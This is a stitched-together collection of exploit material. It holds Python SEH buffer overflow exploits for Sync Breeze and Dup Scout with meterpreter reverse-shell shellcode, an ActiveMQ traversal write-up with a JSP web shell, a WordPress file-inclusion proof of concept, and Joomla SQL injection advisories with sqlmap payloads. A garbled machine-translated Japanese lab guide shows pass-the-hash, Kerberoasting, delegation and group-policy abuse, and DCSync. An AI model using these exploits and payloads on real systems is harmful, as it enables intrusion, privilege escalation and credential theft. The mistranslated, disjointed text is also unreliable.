buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 10015BBE
nseh = "\x90\x90\xEB\x0B"
seh = "\xBE\x5B\x01\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
#!/usr/bin/python
print "Sync Breeze Enterprise 9.1.16 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 8.9.24: www.exploit-db.com/exploits/40456/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 1001A1B8
nseh = "\x90\x90\xEB\x0B"
seh = "\xB8\xA1\x01\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
#!/usr/bin/python
print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 1004FAF3
nseh = "\x90\x90\xEB\x0B"
seh = "\xF3\xFA\x04\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality.
I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter.
An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution.
Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes:
<bean class="org.eclipse.jetty.security.ConstraintMapping" id="securityConstraintMapping">
<property name="constraint" ref="securityConstraint">
<property name="pathSpec" value="/api/*,/admin/*,*.jsp">
</property></property>
</bean>
Effectively blocking the upload of JSP files into contexts that will allow them to execute.
I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials:
$ cat jetty-realm.properties hacker: hacker, admin
$ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties
This seems to have the disadvantage of requiring a reboot of the server to take effect.
I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot.
The attacker can then take a standard JSP shell:
$ cat cmd.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context:
$ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp
And pop a calc on the server:
$ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe
Exploiting non-Windows servers
All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked.
That said, clients can specify the uploadUrl for a blob transfer, e.g.:
tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com
An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers.
Resolution
The ActiveMQ project has released an advisory and patches.
This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind.
It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account.
# Exploit Title: WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/
# Software Link: https://wordpress.org/plugins/wp-vault/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 0.8.6.6
# Tested on: Ubuntu 14.04
1 - Description:
$_GET[“wpv-image”] is not escaped in include file.
http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/
2 - Proof of Concept:
http://Target/?wpv-image=[LFI]
http://Target/?wpv-image=../../../../../../../../../../etc/passwd
3 - Timeline:
12/11/2016 - Discovered
12/11/2016 - vendor not found
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: info@huge-it.com
Description:
Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a
variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php.
Vulnerable Code in : ajax_url.php
11 define('_JEXEC', 1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
309 $catalog_id = $_POST["catalog_id"];
310 $old_count = $_POST["old_count"];
311 $count_into_page = $_POST["count_into_page"];
312 $show_thumbs = $_POST["show_thumbs"];
313 $show_description = $_POST["show_description"];
314 $show_linkbutton = $_POST["show_linkbutton"];
315 $parmalink = $_POST["parmalink"];
316 $level = $_POST['level'];
.
.
.
359 $query->select('*');
360 $query->from('#__huge_it_catalog_products');
361 $query->where('catalog_id =' . $catalog_id);
362 $query->order('ordering asc');
363 $db->setQuery($query, $from, $count_into_page);
CVE-ID: CVE-2016-1000125
Export: JSON TEXT XML
Exploit Code:
• $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" --level=5 --risk=3
•
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
•
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
•
• Type: UNION query
• Title: Generic UNION query (random number) - 15 columns
• Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
• ---
• [16:48:10] [INFO] the back-end DBMS is MySQL
• web server operating system: Linux Debian 8.0 (jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >= 5.0.12
• [16:48:10] [WARNING] HTTP error codes detected during run:
• 500 (Internal Server Error) - 6637 times
• [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
•
• [*] shutting down at 16:48:10
•
Advisory: http://www.vapidlabs.com/advisory.php?v=171
始めたばかりの
ポストセットの知識
友人は、この本をJDまたはTaobaoで購入できます。
Windows Server 2012 R2システム構成ガイド_ Dai YouWeiがコンパイルした記事は、https://github.com/cfalta/adsecから採用されています。
環境構造
https://github.com/cfalta/adsec/tree/main/lab-setup
DC-Windows 2019ユーザーJack-Windows 2019SQLServer-Windows 2019
ドメイン制御を構成
新しいネットワークカードが追加されました。 3つの仮想マシンは、このネットワークカード設定を使用してIPを指定します。仮想マシンを直接コピーします。 MACアドレスとSIDを変更する必要がある場合は、SIDを変更する必要もあります。組み込みのツールSysprepまたは別のNewsIDツールhttps://NewsID.Softag.com/DownLoadを使用して、3つのマシンで管理者の特権を使用して次のコマンドを実行できます。
ファイアウォールを閉じますset-netfirewallprofile -profileドメイン、パブリック、プライベート対応の誤った閉じるウィンドウディフェンダーuninstall-windows-feature-name-defenderダウンロードオートメーションスクリプトアシストインストール
https://github.com/cfalta/adsec/tree/main/lab-setup/domain-setup-scripts
createdomainスクリプトを実行し、ドメイン名を自分で変更します。
これは1つのステップで行うべきではありません
最初に実行します
インストール-WindowsFeature -Name Ad -Domain -Services -IncludeManagementToolsは再起動後も実行を続けます。再起動後、このファイル関数の実行は、JSONファイルに基づいてユーザーとグループを自動的に追加することです。
ドメインコンピューターを構成
2つのメンバーマシンで次の2つのドメインアカウントに登録
ジョン・ドイ・ジョンP@ssw0rdブルース・リーの血まみれの鉄の拳は素晴らしいです!
user1は、blee 
でログインしたJohn Certified user2マシンです
攻撃機の準備
Johnを使用してUser1マシンにログインし、ポイントとして使用してから、ネットワークカードを割り当ててネットワークを外します。
デフォルトのツールキットのダウンロードアドレス
https://github.com/cfalta/adsec/blob/main/exercises/attacker-tools
ハンターのインストールと構成
Google IT
情報収集
パワーモジュールをインポートします
CD C: \ a Ttacker-Tools
cat -raw '。\ powerView.ps1' |スイッチは、現在のドメインの基本情報とドメイン制御の位置を取得します
ドメインを取得します
ドメインコントローラー
を取得します
ドメイン内のコンピューターとユーザーの数を確認してください
ドメインコンピューターを取得します
ドメインユーザーフィルターアウトドメインパイプを取得します
ドメインユーザーを取得| ? {$ _ .MEMBEROF -LIKE ' * DOMAIN ADMIN *'}
ドメインユーザーを取得| ? {$ _ .MEMBEROF -LIKE ' * DOMAIN ADMIN *'} |同じアカウント名を選択します
クラスの演習後
リファレンス回答最後のものを選択します
ドメインにはいくつのコンピューターがあり、それらは何を実行していますか?ドメインには何人のユーザーがいますか?同じユーザー名、表示名、説明、および最後のパスワード変更の時間のみを使用して、すべての属性クエリステートメントを実行および提示してユーザーに表示します。どのカスタム管理者グループを特定できますか?上記のPowerShellを一般的に変更すると、カスタム管理グループを返すことができます。対応する管理者グループメンバーを見つけます。これらのユーザーが最後のパスワードを設定したのはいつですか?ドメイン内のサービスアカウントをすばやく識別する方法はありますか?すべての簡単なサービスアカウントのPowerShellクエリを書きます。
ntlm
の使用PSEXECを模倣するには、管理者の許可が必要で、ローカル管理者ユーザーとログインします
特権:デバッグ
トークン:プロモーション
LSADUMP:SAMは、管理者のハッシュを取得しました
7DFA0531D73101CA080C7379A9BFF1C7PTH攻撃
sekurlsa:pth /user3360administrator /ntlm:7dfa0531d73101ca080c7379a9bff1c7 /domain:wing.lab
:
psexec.exe \\ user2 CMD 
クラスの演習後
Mimikatzが「特権:3360Debug」と「token:Elevate」を実行する目的は何ですか?なぜそれらを実行する必要があるのですか? Bruce Lee 1としてログインします。上記のユーザーの知識を使用してください。ジョンは、ブルース・リーのNTLMハッシュをメモリから支援するリモートで抽出します。 PTHの問題を解決する方法、理由を明確に説明してください。 (おそらく)NTLMではないことは可能ですか?あなたの理由を説明してください。
Kerberos-Baking
プレビューマテリアルネットワーク——AS-REPロースト
プラグインの読み込み
CD C: \ a Ttacker-Tools
生まれた猫。 \ PowerView.ps1 |スイッチ
生まれた猫。 \ i nvoke-rubeus.ps1 |クエリSPNを切り替えて、サービスユーザーを取得します
ドメインユーザー-SPNを取得| SamaccountName、description、pwdlastset、serviceprincipalnameを選択します
:
Rubeusには、Kerberosの統計データがあります
Invoke -rubeus -command 'kerberoast /stats'ターゲットアカウントのTGSを取得
Invoke-rubeus -command 'kerberoast /user:taskservice /format3:hashcat /outfile:krb5tgs.txt'ここでスクリプトは、base64 
の後にパワーシェルメモリを介してロードされます。
function call-rubeus([string] $ command)
{
$ message='base64';
$ Assembly=[System.Reflection.Assembly] :3360load([Convert] :Frombase64String($ message))
[rubeus.program] :3360main($ command .split( ''))
}
:
CRACKED TGS。 \ j ohn.exe . \。 \ k rb5tgs.txt -wordlist=. \。 \ e xample.dict - rules=passphrase-rule2 
クラスの演習後
あなたが最良の緩和手法であると思うものを説明し、その理由を説明してください。 ASREPの影響を受ける別のユーザーがいます。それを見つけてください。 TGS対ASREPベーキングを説明します
Kerberos(委任)
JSONのデータが以前に設定されたとき、JSONのデータはドメインが委任されたユーザー
に変更されずに変更されました
get -domainuser-信頼された委任ターゲット
get -domainuser -trustedtoauth | -expandproperty msds-allowedtodelegateto 
を選択します
この攻撃を実行する条件は、ユーザーのパスワードを知ることです。
ハッシュを生成します
Invoke -rubeus -command 'hash /password:amsterdam2015 /domain3360wing.lab /user:service1'
:
Rubeusを使用すると、PowerShellを新しいログインセッションで開始できます。今回のチケットセッションでのみ、ユーザーのジョンのカーボアーズチケットを妨害しません。 S4Uを使用して、TGSシミュレーションドメイン管理ユーザーBruce(Bwillis))を要求してユーザー1を攻撃します。さまざまなサービスの3つのチケットをリクエストしますCIFはSMBアクセスホスト/RPCS ForWMI 
に使用されます
call -ruber -command "s4u/user:service 1/aes256:be09389d798b17683b105ff6432ba4fd4785da5a08bfd3f39328a6525433e073/infersonateuser/ptt "
call -ruber -command "s4u /user:service 1 /aes256:be09389d798b17683b105ff6432ba4fd4785da5a08bfd3f39328a6525433e073 /infersonateuser /ptt "
call -ruber -command” s4u/user:service 1/aes256:be09389d798b17683b105ff6432ba4fd4785da5a08bfd3f39328a6525433e073/Imprisateuser:bwillisiser /msdsspn:rpcss/user1.wing.lab /ptt "
:
自分の前でチェックレポートを確認してください
私はそれを間違って設定します、代表団のターゲットはuser2、user1に設定する必要がありますが、それはすべて同じです。
ls \\ user1.wing.lab \ c $ control user1を介してcontrol user1
get -wmiobject -class win32_process -computername adsec -01.contoso.com
クラスの演習後
上記の操作では、SMBおよびWMIを介してサーバーユーザーから読み取り権限を取得しました。これで、これら2つのプロトコルを介して実行されます。目標は、次のコマンドを実行して、ユーザーJohnをローカルマネジメントグループパイロットモックドメイン管理者ユーザーChuck Norrisに追加することです。
acl攻撃
情報コレクション
生まれた猫。 \ s harpound.ps1 | Switch Invoke -BloodHound -CollectionMethod DConly -Stealth -PrettyJSon -NosaveCacheCollectionMethod DCは、ドメインコントロールからのみデータを収集することのみを意味します。 OPSECの観点から見ると、トラフィックが正常であるため、これは優れています。ステルスシングルスレッドが始まります。ゆっくりですが、安全です。 PrettyJSONフォーマット.JSONファイル。 nosavecacheは、保存されたファイルを保存しません。
Blood Dogを開始するNEO4J3https://NEO4J.com/download-center/#releases 
のコミュニティバージョンをダウンロード
JDK11
./NEO4J START 
最初のマークService1は、ここをクリックしてここをクリックしてドメインコントロールグループポリシーにアクセスしてください。グループポリシーの利用を通じて、Attack DCはService1 First 
としてログインする必要があります
runas /user:wing.lab \ s ervice1 powershell。 \ s harpgpoabuse.exe -addcomputertAsk - taskname 'update' - author contoso \ a dminuser - command 'cmd.exe' - arguments ' /c netグループ\'ドメインアドミン\ 'john /add' - gponame "defaul controller" - forcecece
執筆後、グループポリシーが更新されたときに管理者をトリガーすることが可能になります。
手作り。許可はアップグレードされ、ドメインコントロールに正常にログインしました。
クラスの演習後
ACL攻撃の搾取ツールは何ですか?
許可メンテナンス
許可を維持することはたくさんあります
金と銀のノートブックバックドアなど。
一般に、DC許可は最初に実行されます
lsadump3:dcsync /user:krbtgtすべてのユーザーハッシュを受信することも、バックドアとして使用できます。
クラスの演習後
自己学習これらの許可維持方法の原則。
参照回答
私はそれを非常にうまくやった。エラーがある場合は、メッセージを残してください。
情報収集
PowerView3.0のヒント
https://gist.github.com/harmj0y/184f9822b195c52dd50c379ed3117993
ドメインにはいくつのコンピューターがあり、それらは何を実行していますか?
ドメインには何人のユーザーがいますか?同じユーザー名、表示名、説明、および最後のパスワード変更の時間のみを使用して、すべての属性クエリステートメントを実行および提示してユーザーに表示します。
どのカスタム管理者グループを特定できますか?上記のPowerShellを一般的に変更すると、カスタム管理グループを返すことができます。 get -domaingroupMember-アイデンティティ「ドメイン管理者」-Recurse 
対応する管理者グループメンバーを見つけます。これらのユーザーが最後のパスワードを設定したのはいつですか?
ドメイン内のサービスアカウントをすばやく識別する方法はありますか?すべての簡単なサービスアカウントのPowerShellクエリを書きます。ドメインユーザー-SPNを取得|選択します
Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Joomla extension v1.0.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-portfolio-gallery/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: info@huge-it.com
Description: Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.
Vulnerability:
The following lines allow unauthenticated users to perform SQL injection against the functions in ajax_url.php:
In file ajax_url.php:
11 define('_JEXEC',1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
49 $page = $_POST["page"];
50 $num=$_POST['perpage'];
51 $start = $page * $num - $num;
52 $idofgallery=$_POST['galleryid'];
53 $level = $_POST['level'];
54 $query = $db->getQuery(true);
55 $query->select('*');
56 $query->from('#__huge_itportfolio_images');
57 $query->where('portfolio_id ='.$idofgallery);
58 $query ->order('#__huge_itportfolio_images.ordering asc');
59 $db->setQuery($query,$start,$num);
CVE-ID: CVE-2016-1000124
Export: JSON TEXT XML
Exploit Code:
• $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" --level=5 --risk=3
•
•
• (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
• sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
• ---
• Parameter: #1* ((custom) POST)
• Type: error-based
• Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
• Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
•
• Type: AND/OR time-based blind
• Title: MySQL >= 5.0.12 time-based blind - Parameter replace
• Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
• ---
• [13:30:39] [INFO] the back-end DBMS is MySQL
